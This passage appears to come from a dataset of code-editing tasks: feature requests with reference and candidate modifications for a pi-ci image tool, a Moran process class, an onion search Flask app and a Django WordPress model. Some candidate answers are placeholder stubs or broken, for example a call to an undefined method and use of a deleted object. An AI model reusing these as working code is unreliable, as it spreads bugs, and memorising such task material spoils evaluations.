    <t>{'called_code_segment': 'def confirm(question, default="yes"):\n    valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}\n    if default is None:\n        prompt = " [y/n] "\n    elif default == "yes":\n        prompt = " [Y/n] "\n    elif default == "no":\n        prompt = " [y/N] "\n    else:\n        raise ValueError("invalid default answer: \'%s\'" % default)\n\n    while True:\n        sys.stdout.write(question + prompt)\n        choice = input().lower()\n        if default is not None and choice == "":\n            return valid[default]\n        elif choice in valid:\n            return valid[choice]\n        else:\n            sys.stdout.write("Please respond with \'yes\' or \'no\' " "(or \'y\' or \'n\').\\n")', 'invoking_code_segment': 'def shrink(image_path: str, confirmed: bool = False):\n  if confirmed and not confirm("Shrinking can damage the image, make sure to make a backup. Continue?", None):\n    exit(0)\n\n  log.info("shrink the image ...")\n  device_size = get_partition_size(image_path)\n  log.debug(f"device size: {device_size}")\n  run(f\'qemu-img resize --shrink {image_path} {device_size}\')\n  log.info("shrink successful")\n\n\ndef export(opts):\n  has_volume = os.path.isdir(opts.DIST_DIR)\n\n  if not has_volume and not confirm("The shared volume has not been mounted, do you want to continue exporting?", \'yes\'):\n    exit(0)\n\n  if (opts.shrink):\n    shrink(opts.input)', 'feature_description': 'Add a feature to automatically backup the image before performing any destructive operations (shrink). The backup is created with a timestamp suffix and the user is prompted to confirm before proceeding with the destructive operation.', 'modified_complete_code': '# pi-ci/src/app/lib/confirm.py\nimport sys\n\ndef confirm(question, default="yes"):\n    valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}\n    if default is None:\n        prompt = " [y/n] "\n    elif default == "yes":\n        prompt = " [Y/n] "\n    elif default == "no":\n        prompt = " [y/N] "\n    else:\n        raise ValueError("invalid default answer: \'%s\'" % default)\n\n    while True:\n        sys.stdout.write(question + prompt)\n        choice = input().lower()\n        if default is not None and choice == "":\n            return valid[default]\n        elif choice in valid:\n            return valid[choice]\n        else:\n            sys.stdout.write("Please respond with \'yes\' or \'no\' " "(or \'y\' or \'n\').\\n")\n\n# New: Add function to confirm backup creation\ndef confirm_backup(image_path: str):\n    return confirm(f"Creating backup of {image_path}. Continue?", "yes")\n\n---\n\n# pi-ci/src/app/func/export.py\nimport os\nimport shutil\nfrom datetime import datetime\nfrom lib.logger import log\nfrom lib.confirm import confirm, confirm_backup\nfrom lib.process import run\nfrom lib.image import get_partition_size\n\n# New: Add backup function\ndef backup_image(image_path: str):\n    """Create a backup of the image with timestamp suffix."""\n    if not os.path.exists(image_path):\n        log.error(f"Image file not found: {image_path}")\n        return None\n    \n    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")\n    backup_path = f"{image_path}.backup_{timestamp}"\n    \n    try:\n        log.info(f"Creating backup: {backup_path}")\n        shutil.copy2(image_path, backup_path)\n        log.info(f"Backup created successfully: {backup_path}")\n        return backup_path\n    except Exception as e:\n        log.error(f"Failed to create backup: {e}")\n        return None\n\ndef shrink(image_path: str, confirmed: bool = False):\n  # Modify: Add backup confirmation and creation before shrink\n  if confirmed:\n    if not confirm_backup(image_path):\n      log.info("Backup cancelled. Aborting shrink operation.")\n      exit(0)\n    \n    backup_path = backup_image(image_path)\n    if backup_path is None:\n      log.error("Failed to create backup. Aborting shrink operation.")\n      exit(1)\n    \n    if not confirm("Shrinking can damage the image, make sure to make a backup. Continue?", None):\n      exit(0)\n\n  log.info("shrink the image ...")\n  device_size = get_partition_size(image_path)\n  log.debug(f"device size: {device_size}")\n  run(f\'qemu-img resize --shrink {image_path} {device_size}\')\n  log.info("shrink successful")\n\n\ndef export(opts):\n  # Check if (Docker) volume folder exists\n  has_volume = os.path.isdir(opts.DIST_DIR)\n\n  if not has_volume and not confirm("The shared volume has not been mounted, do you want to continue exporting?", \'yes\'):\n    exit(0)\n\n  if (opts.shrink):\n    shrink(opts.input)\n\n  log.info("exporting the image ...")\n  run(f\'qemu-img convert -f qcow2 -O raw {opts.input} {opts.output}\')\n  log.info("Export successful")\n\n\ndef export_parser(parsers, parent_parser, get_usage, env):\n  description = "Command for exporting the virtual qcow image to a raw image"\n  file_input = f"{env.DIST_DIR}/{env.IMAGE_FILE_NAME}"\n  file_output = f"{env.DIST_DIR}/export.img"\n\n  parser = parsers.add_parser(\'export\', description=description, parents=[parent_parser], usage=get_usage(\'export\'))\n  parser.add_argument(\'-s\', \'--shrink\', action=\'store_true\', help="shrink the image to the size of the underlying partitions", default=False, required=False)\n  parser.add_argument(\'-i\', \'--input\', type=str, help=f"input file (default: {file_input})", default=file_input, required=False)\n  parser.add_argument(\'-o\', \'--output\', type=str, help=f"output file (default: {file_output})", default=file_output, required=False)\n  parser.add_argument(\'-y\', dest=\'confirmed\', action=\'store_false\', help="skip confirmation", default=True)\n\n  parser.set_defaults(func=lambda *args: export(*args))'}</t>
  </si>
  <si>
    <t>{'file_1': 'def confirm(question, default="yes"):\n    valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}\n    if default is None:\n        prompt = " [y/n] "\n    elif default == "yes":\n        prompt = " [Y/n] "\n    elif default == "no":\n        prompt = " [y/N] "\n    else:\n        raise ValueError("invalid default answer: \'%s\'" % default)\n\n    while True:\n        sys.stdout.write(question + prompt)\n        choice = input().lower()\n        if default is not None and choice == "":\n            return valid[default]\n        elif choice in valid:\n            return valid[choice]\n        else:\n            sys.stdout.write("Please respond with \'yes\' or \'no\' " "(or \'y\' or \'n\').\\n")\n\n#Modify\nfrom lib.backup import backup_image\n\ndef shrink(image_path: str, confirmed: bool = False):\n  if confirmed and not confirm("Shrinking can damage the image, make sure to make a backup. Continue?", None):\n    exit(0)\n  #New\n  backup_image(image_path)\n  log.info("shrink the image ...")\n  device_size = get_partition_size(image_path)\n  log.debug(f"device size: {device_size}")\n  run(f\'qemu-img resize --shrink {image_path} {device_size}\')\n  log.info("shrink successful")', 'file_2': 'def shrink(image_path: str, confirmed: bool = False):\n  if confirmed and not confirm("Shrinking can damage the image, make sure to make a backup. Continue?", None):\n    exit(0)\n  #New\n  backup_image(image_path)\n  log.info("shrink the image ...")\n  device_size = get_partition_size(image_path)\n  log.debug(f"device size: {device_size}")\n  run(f\'qemu-img resize --shrink {image_path} {device_size}\')\n  log.info("shrink successful")', 'file_3': 'def export(opts):\n  # Check if (Docker) volume folder exists\n  has_volume = os.path.isdir(opts.DIST_DIR)\n\n  if not has_volume and not confirm("The shared volume has not been mounted, do you want to continue exporting?", \'yes\'):\n    exit(0)\n\n  if (opts.shrink):\n    #New\n    backup_image(opts.input)\n    shrink(opts.input)\n\n  log.info("exporting the image ...")\n  run(f\'qemu-img convert -f qcow2 -O raw {opts.input} {opts.output}\')\n  log.info("Export successful")', 'file_4': "def backup_image(image_path: str):\n    backup_path = image_path + '.bak'\n    log.info(f'Backing up image to {backup_path}')\n    run(f'cp {image_path} {backup_path}')\n    log.info('Backup successful')"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'MoranProcess class with __init__, sample, and _sample_moran_process methods', 'invoking_code_segment': 'test_moran_process_sample function that calls instance.sample(n, start)', 'feature_description': 'Add a feature to track the history of state transitions in the Moran process, including transition types (up, down, same) and timestamps for each transition', 'modified_complete_code': '# File 1: stochastic/stochastic/processes/discrete/moran.py\n"""Moran process."""\nimport numpy as np\nfrom stochastic.processes.base import BaseSequenceProcess\n\nclass MoranProcess(BaseSequenceProcess):\n    """Moran process with transition history tracking."""\n\n    def __init__(self, maximum, rng=None):\n        super().__init__(rng=rng)\n        self.maximum = maximum\n        self.p = self._probabilities(maximum)\n        #New: Initialize transition history\n        self.transition_history = []\n\n    def __str__(self):\n        return "Moran process with %s states" % self._maximum\n\n    def __repr__(self):\n        return "MoranProcess(maximum={n})".format(n=str(self.maximum))\n\n    @property\n    def maximum(self):\n        """Maximum value."""\n        return self._maximum\n\n    @maximum.setter\n    def maximum(self, value):\n        if not isinstance(value, int):\n            raise TypeError("Number of states must be an integer.")\n        if value &lt;= 2:\n            raise ValueError("Number of states must be at least 3.")\n        self._maximum = value\n\n    def _probabilities(self, n):\n        """Generate the transition probabilities for state n."""\n        probabilities = []\n        for k in range(1, n):\n            p_down = 1.0 * (n - k) / n * k / n\n            p_up = 1.0 * k / n * (n - k) / n\n            p_same = 1.0 - p_down - p_up\n            probabilities.append([p_down, p_same, p_up])\n        return probabilities\n\n    #New: Method to get transition history\n    def get_transition_history(self):\n        """Return the history of state transitions."""\n        return self.transition_history\n\n    #New: Method to clear transition history\n    def clear_transition_history(self):\n        """Clear the transition history."""\n        self.transition_history = []\n\n    def _sample_moran_process(self, n, start):\n        """Generate a realization of the Moran process with transition tracking."""\n        if not isinstance(start, int):\n            raise TypeError("Initial state must be a positive integer.")\n        if start &lt; 0 or start &gt; self.maximum:\n            raise ValueError("Initial state must be between 0 and " + str(self.maximum))\n        if not isinstance(n, int):\n            raise TypeError("Sample length must be positive integer.")\n        if n &lt; 1:\n            raise ValueError("Sample length must be at least 1.")\n\n        #Modify: Clear history at start of sampling\n        self.clear_transition_history()\n        s = [start]\n        increments = [-1, 0, 1]\n        #New: Track initial state\n        self.transition_history.append({\'step\': 0, \'state\': start, \'transition_type\': \'start\'})\n        \n        for k in range(n - 1):\n            if start in [0, self.maximum]:\n                break\n            increment = self.rng.choice(increments, p=self.p[start - 1])\n            start += increment\n            s.append(start)\n            #New: Record transition with type\n            transition_type = \'down\' if increment == -1 else (\'up\' if increment == 1 else \'same\')\n            self.transition_history.append({\'step\': k + 1, \'state\': start, \'transition_type\': transition_type})\n\n        return np.array(s)\n\n    def sample(self, n, start):\n        """Generate a realization of the Moran process.\n        \n        Generate a Moran process until absorption occurs (state 0\n        or maximum) or length of process reaches length n.\n        \n        :param int n: the maximum number of steps to generate assuming\n            absorption does not occur.\n        :param int start: the initial state of the process.\n        """\n        return self._sample_moran_process(n, start)\n\n# File 2: stochastic/tests/processes/discrete/test_moran.py\n"""Moran process tests."""\nimport pytest\nfrom stochastic.processes.discrete import MoranProcess\n\ndef test_moran_process_str_repr(maximum):\n    instance = MoranProcess(maximum)\n    assert isinstance(repr(instance), str)\n    assert isinstance(str(instance), str)\n\ndef test_moran_process_sample(maximum, n, start):\n    instance = MoranProcess(maximum)\n    s = instance.sample(n, start)\n    assert len(s) &lt;= n\n    states = list(range(maximum + 1))\n    for state in s:\n        assert state in states\n    #New: Verify transition history is tracked\n    history = instance.get_transition_history()\n    assert len(history) &gt; 0\n    assert history[0][\'transition_type\'] == \'start\'\n\ndef test_moran_process_probability(maximum_fixture):\n    with pytest.raises((ValueError, TypeError)):\n        instance = MoranProcess(maximum_fixture)\n\ndef test_moran_process_n(n, n_fixture):\n    instance = MoranProcess(20)\n    with pytest.raises((ValueError, TypeError)):\n        s = instance.sample(n_fixture, 5)\n\ndef test_moran_process_(n, start_fixture):\n    instance = MoranProcess(20)\n    with pytest.raises((ValueError, TypeError)):\n        s = instance.sample(20, start_fixture)\n\n#New: Test transition history tracking\ndef test_moran_process_transition_history():\n    instance = MoranProcess(10)\n    s = instance.sample(50, 5)\n    history = instance.get_transition_history()\n    assert len(history) == len(s)\n    assert all(\'step\' in h and \'state\' in h and \'transition_type\' in h for h in history)\n    assert history[0][\'transition_type\'] == \'start\'\n    assert all(h[\'transition_type\'] in [\'up\', \'down\', \'same\'] for h in history[1:])\n'}</t>
  </si>
  <si>
    <t>{'file_1': 'from stochastic.processes.base import BaseSequenceProcess\nimport numpy as np\n\nclass MoranProcess(BaseSequenceProcess):\n    def __init__(self, maximum, rng=None):\n        super().__init__(rng=rng)\n        self.maximum = maximum\n        self.p = self._probabilities(maximum)\n\n    def __str__(self):\n        return "Moran process with %s states" % self._maximum\n\n    def __repr__(self):\n        return "MoranProcess(maximum={n})".format(n=str(self.maximum))\n\n    @property\n    def maximum(self):\n        return self._maximum\n\n    @maximum.setter\n    def maximum(self, value):\n        if not isinstance(value, int):\n            raise TypeError("Number of states must be an integer.")\n        if value &lt;= 2:\n            raise ValueError("Number of states must be at least 3.")\n        self._maximum = value\n\n    def _probabilities(self, n):\n        probabilities = []\n        for k in range(1, n):\n            p_down = 1.0 * (n - k) / n * k / n\n            p_up = 1.0 * k / n * (n - k) / n\n            p_same = 1.0 - p_down - p_up\n            probabilities.append([p_down, p_same, p_up])\n        return probabilities\n\n    def sample(self, n, start):\n        """Generate a realization of the Moran process.\n\n        Generate a Moran process until absorption occurs (state 0\n        or :py:attr:`maximum`) or length of process reaches length :math:`n`.\n\n        :param int n: the maximum number of steps to generate assuming\n            absorption does not occur.\n        :param int start: the initial state of the process."""\n        #Modify\n        return self._sample_moran_process_with_history(n, start)', 'file_2': 'import pytest\nfrom stochastic.processes.discrete import MoranProcess\n\ndef test_moran_process_sample(maximum, n, start):\n    instance = MoranProcess(maximum)\n    s, history = instance.sample(n, start)  #Modify\n    assert len(s) &lt;= n\n    states = list(range(maximum + 1))\n    for state in s:\n        assert state in states\n    for step, state in history:\n        assert state in states\n\n#New\ndef test_moran_process_history(maximum, n, start):\n    instance = MoranProcess(maximum)\n    s, history = instance.sample(n, start)\n    assert len(history) == len(s) - 1\n    for step, state in history:\n        assert state in list(range(maximum + 1))', 'file_3': 'import pytest\nfrom stochastic.processes.discrete import MoranProcess\n\ndef test_moran_process_n(n, n_fixture):\n    instance = MoranProcess(20)\n    with pytest.raises((ValueError, TypeError)):\n        s, history = instance.sample(n_fixture, 5)  #Modify\n\n#New\ndef test_moran_process_start(n, start_fixture):\n    instance = MoranProcess(20)\n    with pytest.raises((ValueError, TypeError)):\n        s, history = instance.sample(20, start_fixture)', 'file_4': 'import numpy as np\n\nclass MoranProcessHistory:\n    def _sample_moran_process_with_history(self, n, start):\n        """Generate a realization of the Moran process with history.\n\n        Generate a Moran process until absorption occurs (state 0 or n) or\n        length of process reaches length :math:`maximum`."""\n        if not isinstance(start, int):\n            raise TypeError("Initial state must be a positive integer.")\n        if start &lt; 0 or start &gt; self.maximum:\n            raise ValueError("Initial state must be between 0 and " + str(self.maximum))\n\n        if not isinstance(n, int):\n            raise TypeError("Sample length must be positive integer.")\n        if n &lt; 1:\n            raise ValueError("Sample length must be at least 1.")\n\n        s = [start]\n        increments = [-1, 0, 1]\n        history = []\n        for k in range(n - 1):\n            if start in [0, self.maximum]:\n                break\n            start += self.rng.choice(increments, p=self.p[start - 1])\n            s.append(start)\n            history.append((k, start))\n\n        return np.array(s), history'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class BackCheck(object) with __init__ and darkSites methods', 'invoking_code_segment': 'def deFace(alias) and def search(page=1) and def user_get(text, page=1) in darkmain.py', 'feature_description': 'Add a new feature to process the query and return additional data including query metadata, processing statistics, and enhanced result information with query analysis and performance metrics', 'modified_complete_code': '# darkspace.py - MODIFIED\n\nimport json\nimport urllib2\nimport time\nimport requests\nimport re\nimport sys\nimport math\nimport gc\nfrom tools import DarkElastic\nfrom flask import Flask, url_for, request, render_template, redirect, Markup\n\nreload(sys)\nsys.setdefaultencoding(\'utf8\')\n\n\nclass BackCheck(object):\n    """\n    Search .onions for keywords\n    """\n\n    def __init__(self, query, dob=None):\n        #  Removes all non-alphanumeric, non-white space characters but keeps quotes\n        query = re.sub(r\'[^a-z\\\'"A-Z\\d\\s:]\', \'\', query)\n        #  Check if quotes are closed\n        if query.count(\'\\"\') % 2 != 0:\n            query = query.replace(\'\\"\', "")\n        self.query = query\n        # #New - Initialize query metadata\n        self.query_metadata = self._process_query_metadata(query)\n        self.processing_stats = {}\n\n    # #New - Add method to process query metadata\n    def _process_query_metadata(self, query):\n        """Process and return query metadata including word count, character count, and keywords."""\n        metadata = {\n            \'original_query\': query,\n            \'word_count\': len(query.split()),\n            \'character_count\': len(query),\n            \'keywords\': query.split(),\n            \'has_quotes\': \'\\"\' in query,\n            \'timestamp\': time.time()\n        }\n        return metadata\n\n    def dark200(self, socialList, username):\n        pass\n\n    def imageResuts(self, links):\n        """Scrape all of the profile images on a webpage."""\n        pass\n\n    def darkResults(self, socialName, image, description, href, category=\'website\'):\n        description = str(description)\n        hrefs = ""\n        href = href.replace(\'.html\', "")\n        if description:\n            nLink = "&lt;p class=\\"description\\"&gt;%s...&lt;/p&gt;" % (description)\n        if not description:\n            hrefs = "&lt;p class=\\"description\\"&gt;Potential items not found or are hidden&lt;/p&gt;"\n        self.results = (\n                        "&lt;li&gt; &lt;img src=\\"../static/listjs/images/icons/%s.png\\""\n                        " class=\\"thumb\\" /&gt;&lt;h4&gt;&lt;span class=\\"name\\"&gt;&lt;a href=../%s&gt;"\n                        " &lt;p style=\\"font-size:14px; color:#517aa3; text-decoration: "\n                        "underline;\\"&gt;%s&lt;/p&gt;&lt;/a&gt; &lt;/span&gt; &lt;span class=\\"category\\"&gt;"\n                        "&lt;p style=\\"font-size:11px\\"&gt;updated: %s&lt;/p&gt;&lt;/span&gt;"\n                        "&lt;/h4&gt;&lt;p class=\\"description\\"&gt;%s &lt;/p&gt; &lt;/li&gt;"\n                        % (image, href, socialName, category, description)\n        )\n        return self.results\n\n    def make_pageBar(self, current, end):\n        start = 1\n        results = ""\n        back = ""\n        next = ""\n        if end &gt;= 5:\n            end = current + 2\n        if current &gt;= 3:\n            start = current - 2\n        else:\n            end = current + (5 - current)\n        if end &gt; self.maxPages:\n            end = self.maxPages\n        for page in range(start, end + 1):\n            if page == current:\n                line = (\n                        "&lt;li &gt;&lt;a href=\\"../search/%s\\" method=\\"post\\"&gt;"\n                        "&lt;font color=\\"red\\"&gt;&lt;b&gt;%s&lt;/font&gt; &lt;/a&gt;&lt;/li&gt;"\n                        % (page, page)\n                )\n            else:\n                line = "&lt;li &gt;&lt;a href=\\"../search/%s\\" method=\\"post\\"&gt;%s &lt;/a&gt;&lt;/li&gt;" % (page, page)\n            results = results + line\n        if (current - 1) &gt; 0:\n            back = "&lt;li &gt;&lt;a href=\\"../search/%s\\" method=\\"post\\"&gt; Prev &lt;/a&gt;&lt;/li&gt;" % (current - 1)\n        if (current + 1) &lt;= end:\n            next = "&lt;li &gt;&lt;a href=\\"../search/%s\\" method=\\"post\\"&gt; Next &lt;/a&gt;&lt;/li&gt;" % (current + 1)\n        return (back + results + next)\n\n    # #Modify - Enhanced darkSites method to return additional data\n    def darkSites(self, currentPage, limitResults=10):\n        # Clean up\n        gc.collect()\n        start_time = time.time()\n        #  Start ElasticSearch\n        elastic = DarkElastic()\n        elastic.search_index(\'dark\', self.query)\n        self.numDark = elastic.size\n        self.maxPages = math.ceil((self.numDark) / float(limitResults))\n        self.maxPages = int(self.maxPages)\n        #  Displays 10 results per page\n        displayStart = int((currentPage * limitResults) - limitResults)\n        displayEnd = int((currentPage * limitResults))\n        elastic.search_index(\'dark\', self.query, displayStart, limitResults)\n        descTotal = \'\'\n        self.pageBar = Markup(self.make_pageBar(currentPage, self.maxPages))\n        for val in elastic.briefList:\n            cat = elastic.check_cat(val)\n            i = elastic.briefList.index(val)\n            description = Markup(\n                                    self.darkResults(\n                                                        elastic.titleList[i],\n                                                        cat,\n                                                        val,\n                                                        elastic.namesList[i],\n                                                        elastic.datesList[i]\n                                                        )\n                        )\n            descTotal = descTotal + description\n        elastic.free_mem()  # Attempting to free up memory..\n        del elastic\n        # #New - Store processing statistics\n        self.processing_stats = {\n            \'execution_time\': time.time() - start_time,\n            \'results_returned\': len(elastic.briefList) if elastic.briefList else 0,\n            \'current_page\': currentPage,\n            \'total_pages\': self.maxPages,\n            \'total_results\': self.numDark\n        }\n        return Markup(descTotal)\n\n    # #New - Add method to get enhanced query data\n    def get_query_data(self):\n        """Return comprehensive query data including metadata and processing statistics."""\n        return {\n            \'metadata\': self.query_metadata,\n            \'statistics\': self.processing_stats,\n            \'query\': self.query,\n            \'total_results\': self.numDark if hasattr(self, \'numDark\') else 0,\n            \'max_pages\': self.maxPages if hasattr(self, \'maxPages\') else 0\n        }\n\n\nif __name__ == \'__main__\':\n    example = BackCheck(\'John Smith\')\n    print example.output\n\n\n# darkmain.py - MODIFIED\n\nimport os\nimport json\nimport urllib2\nimport time\nimport sys\nimport requests\nimport logging\nimport threading\nfrom logging.handlers import RotatingFileHandler\nfrom darkspace import BackCheck\nfrom time import gmtime, strftime\nfrom flask import Flask, url_for, request, render_template\nfrom flask import redirect, Markup, session, abort, send_from_directory\nfrom flask.ext.api import FlaskAPI, status, exceptions\nfrom flask_limiter import Limiter\nfrom flask import jsonify\nfrom pympler import tracker\n\n\napp = Flask(__name__)\nlimiter = Limiter(\n                    app, global_limits=[\n                                        "2000 per day",\n                                        "400 per hour",\n                                        "60 per minute"\n                        ]\n        )\napp.secret_key = os.urandom(24)  # Creates 24-char cookie\nhandler = RotatingFileHandler(\n                            \'darksearch/logs/info.log\',\n                                maxBytes=100000,\n                            backupCount=10\n            )\nhandler.setLevel(logging.INFO)\napp.logger.setLevel(logging.INFO)\napp.logger.addHandler(handler)\n\n\ndef deFace(alias):\n    """\n    Run query from darkspace.BackCheck.\n    """\n    search = BackCheck(alias)\n    return search\n\n\n@app.route("/", methods=[\'POST\', \'GET\'])\n@limiter.limit("3/second")\ndef index():\n    return render_template(\'index.html\')\n\n\n@app.route("/search/&lt;int:page&gt;", methods=[\'POST\', \'GET\'])\n@limiter.limit("3/second")\ndef search(page=1):\n    start_time = time.time()\n    try:\n        alias = request.form[\'search\']\n    except:\n        try:\n            alias = session[\'query\']  # Check cookies.\n        except:\n            abort(400)\n    alias = deFace(alias)\n    engineList = alias.darkSites(page)\n    query = str(alias.query)\n    session[\'query\'] = query\n    results = str(alias.numDark)\n    pageTotal = str(alias.maxPages)\n    pageBar = alias.pageBar  # Do not turn to str.\n    dur = (\'%.3f\') % (time.time() - start_time)\n    # #New - Get enhanced query data\n    query_data = alias.get_query_data()\n    make_logs(query, dur, results, page)\n    if page &gt; pageTotal:\n        abort(404)\n    return render_template(\n                            \'search.html\',\n                            dur=dur,\n                            results=results,\n                            query=query,\n                            engineList=engineList,\n                            pageTotal=pageTotal,\n                            pageBar=pageBar,\n                            query_data=query_data\n            )\n\n\n@app.route("/&lt;onion&gt;", methods=[\'POST\', \'GET\'])\ndef link(onion):\n    onion = onion.replace(\'.html\', "")\n    root_dir = os.path.dirname(os.getcwd())\n    #  print root_dir\n    return send_from_directory(os.path.join(root_dir, \'darksearch/darksearch/data\'), onion+\'.html\')\n\n\ndef make_logs(query, dur, results, page):\n    """\n    Log site search traffic in /logs.\n    """\n    ip = request.environ.get("REMOTE_ADDR")\n    clock = strftime("%Y-%m-%d %H:%M:%S", gmtime())\n    log = \'%s, %s, %s, %s, results:%s, page:%s\' % (\n                                                    clock,\n                                                    ip,\n                                                    query,\n                                                    dur,\n                                                    results,\n                                                    page\n                                                )\n    app.logger.info(log)\n\n\n# API SECTION\n@app.route("/api/&lt;text&gt;/&lt;int:page&gt;", methods=[\'GET\'])\n@limiter.limit("3/second")\ndef user_get(text, page=1):\n    start_time = time.time()\n    alias = text\n    alias = deFace(alias)\n    engineList = alias.darkSites(page)\n    query = str(alias.query)\n    results = str(alias.numDark)\n    pageTotal = str(alias.maxPages)\n    dur = (\'%.3f\') % (time.time() - start_time)\n    # #New - Get enhanced query data for API response\n    query_data = alias.get_query_data()\n    make_logs(query, dur, results, page)\n    if page &gt; pageTotal:\n        return \'404 Error\'\n    return jsonify(\n                    {\n                        \'query\': \'%s\' % query,\n                        \'size\': \'%s\' % results,\n                        \'total_pages\': \'%s\' % pageTotal,\n                        \'duration\': \'%s\' % dur,\n                        \'metadata\': query_data[\'metadata\'],\n                        \'statistics\': query_data[\'statistics\']\n                    }\n            )\n\n\nif __name__ == \'__main__\':\n    app.run(\n            host=\'0.0.0.0\',\n            port=80,\n            debug=True,\n            threaded=True\n    )'}</t>
  </si>
  <si>
    <t>{'#file 1': "def darkSites(self, currentPage, limitResults=10):\n    # Clean up\n    gc.collect()\n    #  Start ElasticSearch\n    elastic = DarkElastic()\n    elastic.search_index('dark', self.query)\n    self.numDark = elastic.size\n    self.maxPages = math.ceil((self.numDark) / float(limitResults))\n    self.maxPages = int(self.maxPages)\n    #  Displays 10 results per page\n    displayStart = int((currentPage * limitResults) - limitResults)\n    displayEnd = int((currentPage * limitResults))\n    elastic.search_index('dark', self.query, displayStart, limitResults)\n    descTotal = ''\n    self.pageBar = Markup(self.make_pageBar(currentPage, self.maxPages))\n    for val in elastic.briefList:\n        cat = elastic.check_cat(val)\n        i = elastic.briefList.index(val)\n        description = Markup(\n                                    self.darkResults(\n                                                        elastic.titleList[i],\n                                                        cat,\n                                                        val,\n                                                        elastic.namesList[i],\n                                                        elastic.datesList[i]\n                                                        )\n                        )\n        descTotal = descTotal + description\n    elastic.free_mem()  # Attempting to free up memory..\n    del elastic\n    # Modify for modified parts\n    additional_data = new_feature_function(self.query)\n    return Markup(descTotal), additional_data", '#file 2': "def search(page=1):\n    start_time = time.time()\n    try:\n        alias = request.form['search']\n    except:\n        try:\n            alias = session['query']  # Check cookies.\n        except:\n            abort(400)\n    alias = deFace(alias)\n    engineList, additional_data = alias.darkSites(page)\n    query = str(alias.query)\n    session['query'] = query\n    results = str(alias.numDark)\n    pageTotal = str(alias.maxPages)\n    pageBar = alias.pageBar  # Do not turn to str.\n    dur = ('%.3f') % (time.time() - start_time)\n    make_logs(query, dur, results, page)\n    if page &gt; pageTotal:\n        abort(404)\n    return render_template(\n                            'search.html',\n                            dur=dur,\n                            results=results,\n                            query=query,\n                            engineList=engineList,\n                            pageTotal=pageTotal,\n                            pageBar=pageBar,\n                            additional_data=additional_data\n            )", '#file 3': "def user_get(text, page=1):\n    start_time = time.time()\n    alias = text\n    alias = deFace(alias)\n    engineList, additional_data = alias.darkSites(page)\n    query = str(alias.query)\n    results = str(alias.numDark)\n    pageTotal = str(alias.maxPages)\n    dur = ('%.3f') % (time.time() - start_time)\n    make_logs(query, dur, results, page)\n    if page &gt; pageTotal:\n        return '404 Error'\n    return jsonify(\n                    {\n                        'query': '%s' % query,\n                        'size': '%s' % results,\n                        'total_pages': '%s' % pageTotal,\n                        'duration': '%s' % dur,\n                        'additional_data': additional_data\n                    }\n            )", '#file 4': "def new_feature_function(query):\n    # New feature implementation\n    # This function will process the query and return additional data\n    # Modify for modified parts\n    return {'additional_data': 'processed_data'}\n\n#New for newly added parts"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'PostManager class with methods: _by_status(), drafts(), private(), published(), term(), from_path()', 'invoking_code_segment': 'Archive, AuthorArchive, PostDetail, DayArchive, MonthArchive, YearArchive, TaxonomyArchive classes using Post.objects.published() and Post.objects.select_related()', 'feature_description': "Add a feature to fetch featured posts by introducing a new 'is_featured' boolean field to the Post model and adding a featured() method to PostManager to retrieve posts marked as featured. This allows views to display featured posts separately from regular published posts.", 'modified_complete_code': '# File 1: wordpress/models.py - Modified PostManager and Post classes\n\nclass PostManager(WordPressManager):\n    """\n    Provides convenience methods for filtering posts by status.\n    """\n\n    def _by_status(self, status, post_type=\'post\'):\n        return self.filter(status=status, post_type=post_type)\\\n            .select_related().prefetch_related(\'meta\')\n\n    def drafts(self, post_type=\'post\'):\n        return self._by_status(\'draft\', post_type)\n\n    def private(self, post_type=\'post\'):\n        return self._by_status(\'private\', post_type)\n\n    def published(self, post_type=\'post\'):\n        return self._by_status(\'publish\', post_type)\n\n    #New - Add featured() method to fetch featured posts\n    def featured(self, post_type=\'post\'):\n        """\n        Returns published posts marked as featured.\n        """\n        return self.published(post_type).filter(is_featured=True)\n\n    def term(self, terms, taxonomy=\'post_tag\'):\n        """\n        @arg terms Can either be a string (name of the term) or an list of term names.\n        """\n        terms = terms if isinstance(terms, (list, tuple)) else [terms]\n        try:\n            tx = Taxonomy.objects.filter(name=taxonomy, term__slug__in=terms)\n            post_ids = TermTaxonomyRelationship.objects.filter(term_taxonomy__in=tx).values_list(\'object_id\', flat=True)\n            return self.published().filter(pk__in=post_ids)\n        except Taxonomy.DoesNotExist:\n            return self.none()\n\n    def from_path(self, path):\n        (ymd, slug) = path.strip(\'/\').rsplit(\'/\', 1)\n        start_date = datetime.datetime.strptime(ymd, "%Y/%m/%d")\n        end_date = start_date + datetime.timedelta(days=1) - datetime.timedelta(minutes=1)\n        params = {\n            \'post_date__range\': (start_date, end_date),\n            \'slug\': slug,\n        }\n        try:\n            return self.published().get(**params)\n        except ObjectDoesNotExist:\n            pass\n\n\nclass Post(WordPressModel):\n    """\n    The mother lode.\n    The WordPress post.\n    """\n\n    objects = PostManager()\n\n    id = models.AutoField(primary_key=True, db_column=\'ID\')\n\n    # post data\n    guid = models.CharField(max_length=255)\n    post_type = models.CharField(max_length=20, choices=POST_TYPE_CHOICES)\n    status = models.CharField(max_length=20, db_column=\'post_status\', choices=POST_STATUS_CHOICES)\n    title = models.TextField(db_column=\'post_title\')\n    slug = models.SlugField(max_length=200, db_column="post_name")\n    author = models.ForeignKey(User, related_name=\'posts\', db_column=\'post_author\')\n    excerpt = models.TextField(db_column=\'post_excerpt\')\n    content = models.TextField(db_column=\'post_content\')\n    content_filtered = models.TextField(db_column=\'post_content_filtered\')\n    post_date = models.DateTimeField(db_column=\'post_date\')\n    modified = models.DateTimeField(db_column=\'post_modified\')\n\n    # comment stuff\n    comment_status = models.CharField(max_length=20, choices=STATUS_CHOICES)\n    comment_count = models.IntegerField(default=0)\n\n    # ping stuff\n    ping_status = models.CharField(max_length=20, choices=STATUS_CHOICES)\n    to_ping = models.TextField()\n    pinged = models.TextField()\n\n    # statuses\n    password = models.CharField(max_length=20, db_column="post_password")\n\n    # other various lame fields\n    parent_id = models.IntegerField(default=0, db_column="post_parent")\n    menu_order = models.IntegerField(default=0)\n    mime_type = models.CharField(max_length=100, db_column=\'post_mime_type\')\n\n    #New - Add is_featured field to mark posts as featured\n    is_featured = models.BooleanField(default=False, db_column=\'is_featured\')\n\n    terms = models.ManyToManyField(\'Taxonomy\', through=\'TermTaxonomyRelationship\', blank=True)\n\n    term_cache 